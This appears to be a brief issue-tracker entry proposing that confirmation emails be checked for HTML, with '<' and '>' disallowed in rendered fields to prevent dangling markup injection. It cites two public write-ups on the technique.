Mail Check - Dangling Markup Injection in Confirmation Emails

[massar]

For the emails we sent out, make sure there is no (valid) HTML in them.

While we do not set the content to HTML, likely quite a few mail clients will just render it as HTML.

Thus at minimum we should never allow '<' and '>' in any fields that we render as email, so that no HTML tags can be formed.

See amongst others:

http://lcamtuf.coredump.cx/postxss/ https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-ssl-certificates-from-comodo-via-dangling-markup-injection/index.html